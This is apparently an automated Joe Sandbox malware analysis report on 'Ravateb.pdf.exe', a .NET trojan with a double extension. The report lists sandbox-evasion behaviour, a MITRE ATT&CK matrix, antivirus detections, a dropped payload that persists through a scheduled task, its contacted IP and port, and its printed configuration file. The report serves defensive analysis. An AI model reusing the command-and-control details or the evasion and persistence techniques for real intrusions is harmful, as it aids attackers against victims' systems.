          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeMemory allocated: 1B1D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exe TID: 7556Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -115355s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -84005s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -79083s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -90083s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -111560s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -73327s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -85200s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -110955s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -94551s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -69363s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -115524s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -100385s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -108688s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -114233s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -94273s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe TID: 5744Thread sleep time: -67182s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BaseBoard
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 115355Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 84005Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 79083Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 90083Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 111560Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 73327Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 85200Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 110955Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 94551Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 69363Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 115524Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 100385Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 108688Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 114233Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 94273Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeThread delayed: delay time: 67182Jump to behavior
          Source: Ravateb.pdf.exeBinary or memory string: vmware
          Source: windowsObject.exe, 00000008.00000002.2436238913.000000001BE07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeQueries volume information: C:\Users\user\Desktop\Ravateb.pdf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          Scheduled Task/Job          		1
          Process Injection          		11
          Masquerading          		OS Credential Dumping111
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          Scheduled Task/Job          		1
          Disable or Modify Tools          		LSASS Memory41
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media11
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job          		Logon Script (Windows)1
          DLL Side-Loading          		41
          Virtualization/Sandbox Evasion          		Security Account Manager32
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Process Injection          		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script211
          Obfuscated Files or Information          		LSA SecretsInternet Connection DiscoverySSHKeylogging11
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1636359 Sample: Ravateb.pdf.exe Startdate: 12/03/2025 Architecture: WINDOWS Score: 100 20 Antivirus / Scanner detection for submitted sample 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Sigma detected: Suspicious Double Extension File Execution 2->24 26 7 other signatures 2->26 5 Ravateb.pdf.exe 4 2->5         started        8 windowsObject.exe 2 2->8         started        process3 dnsIp4 12 C:\Users\user\AppData\...\windowsObject.exe, PE32 5->12 dropped 14 C:\Users\user\...\windowsObject.exe.config, XML 5->14 dropped 16 C:\Users\user\AppData\...\Ravateb.pdf.exe.log, ASCII 5->16 dropped 18 89.46.233.239, 10443, 49721, 49722 ALTER-NET-ASZorilorNr11SfGheorgheRO Romania 8->18 28 Antivirus detection for dropped file 8->28 30 Multi AV Scanner detection for dropped file 8->30 file5 signatures6

          Screenshots

          Download Video

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Ravateb.pdf.exe53%ReversingLabsWin32.Trojan.Generic
          Ravateb.pdf.exe56%VirustotalBrowse
          Ravateb.pdf.exe100%AviraTR/Drop.Agent.rdgar

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe100%AviraTR/Drop.Agent.uvdrx
          C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe46%ReversingLabsByteCode-MSIL.Trojan.Generic

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://89.46.233.239/resource0%Avira URL Cloudsafe

          Domains and IPs

          Download Network PCAP: filteredfull

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://89.46.233.239/resourcefalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          89.46.233.239
          		unknownRomania
          		39531ALTER-NET-ASZorilorNr11SfGheorgheROfalse

          General Information

          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1636359
          Start date and time:2025-03-12 17:36:12 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 19s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Ravateb.pdf.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@2/3@0/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 61%
          • Number of executed functions: 87
          • Number of non-executed functions: 14
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target Ravateb.pdf.exe, PID 7532 because it is empty
          • Execution Graph export aborted for target windowsObject.exe, PID 7368 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          12:37:40API Interceptor16x Sleep call for process: windowsObject.exe modified
          16:37:29Task SchedulerRun new task: MonitorUpdate path: C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe s>-time 6.9.2018

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ALTER-NET-ASZorilorNr11SfGheorgheROpp.dd.exeGet hashmaliciousUnknownBrowse
          • 93.115.172.125
          RPV.exeGet hashmaliciousI2PRATBrowse
          • 93.115.172.125
          pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
          • 93.115.172.41
          pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • 89.46.234.189
          boatnet.x86Get hashmaliciousMiraiBrowse
          • 89.46.238.151
          jRBdJBRpyaGet hashmaliciousMiraiBrowse
          • 89.46.234.98

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ravateb.pdf.exe.log

          Download File
          Process:C:\Users\user\Desktop\Ravateb.pdf.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1256
          Entropy (8bit):5.374602683269243
          Encrypted:false
          SSDEEP:24:ML9E4KQ71qE4GIs0E4K6sXE4NpOKDE4KGKZI6KhgLE4qE4j:MxHKQ71qHGIs0HKJHNpOYHKGSI6ogLH0
          MD5:30DF38800889AFFA36F245B0B93E739D
          SHA1:7B1FA4068DBB69602DC6A1F29FEC85A59C9C1A2D
          SHA-256:15E36C0B1FC39352D3949DB000A79241847FFC3CD92464D7F8A33AC7DD476F9B
          SHA-512:5EA97C947E03156BE300E575FA0100F325B48737333F3AFF901A387DC5DFC96EB6CF1896371D59F15C0AC80A05B5EB1478995293779FFFCC7D920CFD4301C41A
          Malicious:true
          Reputation:low
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.3

          C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe

          Download File
          Process:C:\Users\user\Desktop\Ravateb.pdf.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):22016
          Entropy (8bit):5.404827374048407
          Encrypted:false
          SSDEEP:384:2+zNEKEzqLsr037UGawZontu+cGeC1gtk9EhKwQ4qEQuBhCUIZ:2+gysg37EUSGfjVQuA
          MD5:2BC1C670A5C179E58F6C33C7469B9D98
          SHA1:A4E19863DD1272897E64C9A0E8C78D2955196020
          SHA-256:4CF084851C46DAAF46D3D805CF76D01D9910DCBD9E314FACE1A3684C869243EC
          SHA-512:D8C10907A34B739D012A23098941A3C2B52E37CA350778A36813E7123FCDDBAC58FDA04CFF9A6B64EE16B5745A924E1D3521C45863B8746770811671EE5AF14B
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 46%
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1............"...0..J...........i... ........@.. ....................................@..................................h..O.......|............................h............................................... ............... ..H............text...HI... ...J.................. ..`.rsrc...|............L..............@..@.reloc...............T..............@..B.................h......H........7..p0...........g...............................................0..n.......s.......}......}......}....s.....(....... ...s.....o....o...+....o....,..o........o....r...ps....z.,..o......*........!.Ab.......0............(.......(....*.0.............2...%..{.....%.r;..p.%..{.....%.r;..p.%..{.....%.r;..p.(....}....r?..p(.....(....rW..po....( ...}..... ....(....r[..po....( ...Z}..... ....(....ro..po....( ...Z}......(....r...po.....(....}.... .....X..Zj.#...=..9F#..../.>..

          C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe.config

          Download File
          Process:C:\Users\user\Desktop\Ravateb.pdf.exe
          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
          Category:dropped
          Size (bytes):365
          Entropy (8bit):5.125232360922898
          Encrypted:false
          SSDEEP:6:JiMVBd1IUyXI9VWmtClMyRO8pAqQYzAqT94Aq6wIeAqifU3QIT:MMHdGUyX2yRO+lXZ5c6wXifU3xT
          MD5:B02222CD7C9C9BFDFD46CCD81F07C72F
          SHA1:4E3893209D3277EC60B8724E17F2D319F6320939
          SHA-256:EEC4505CE406B8AE330D3B8CD3B589C02DD05727D9ECC43A3BAC0EFCDA2D7BA3
          SHA-512:D5301FACB0FE60AFE107A07F020D5275FB66D14BD4EBFDA24B56A01FBA208682078180B73C47610EDE780BD3CC1B129430E4300FD324EB995983224331328E00
          Malicious:true
          Reputation:low
          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <system.net>.. <defaultProxy useDefaultCredentials="true" />.. </system.net>.. <appSettings>.. <add key="P" value="10443" />.. <add key="lower_sec" value="60" />.. <add key="upper_sec" value="120" />... <add key="I" value="UXClxFCHX11IJEllWXFQHCg==" />.. </appSettings>..</configuration>

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):4.553261821545199
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:Ravateb.pdf.exe
          File size:82'944 bytes
          MD5:e7d52ef521b8cd0b405575c185d64033
          SHA1:6bb4414d717a290b80cca32655b7198f0c832add
          SHA256:b607d60d680f1f1335902a666df843ac9cc58299af6731d2ad1a5ea617cf4a99
          SHA512:b5ac834fb2e4e041d065019d01ab62ed4f8b0fd27e0161a92a22e55d38f179551d7e24cbaa0bd3abaaff9cf6aae60f264839b4ce432dfc46d6e16b584211d935
          SSDEEP:1536:td3EbUIfBRgAZp/ou8eFT9UiDsgWjiPoihPmdD6Hw0QYsDN:3DIZTz1QDiE6HwdFD
          TLSH:A983B92529EB109DF3A79FB11FD8F8FF89AAE573691D70BA204147464B22D40CD12B36
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"...0.."... ......fA... ...`....@.. ....................................@................................

          File Icon

          Icon Hash:39620052d27a5300

          Static PE Info

          General

          Entrypoint:0x414166
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0xB2D854D6 [Fri Jan 30 06:19:02 2065 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Instruction
          jmp dword ptr [00402000h]
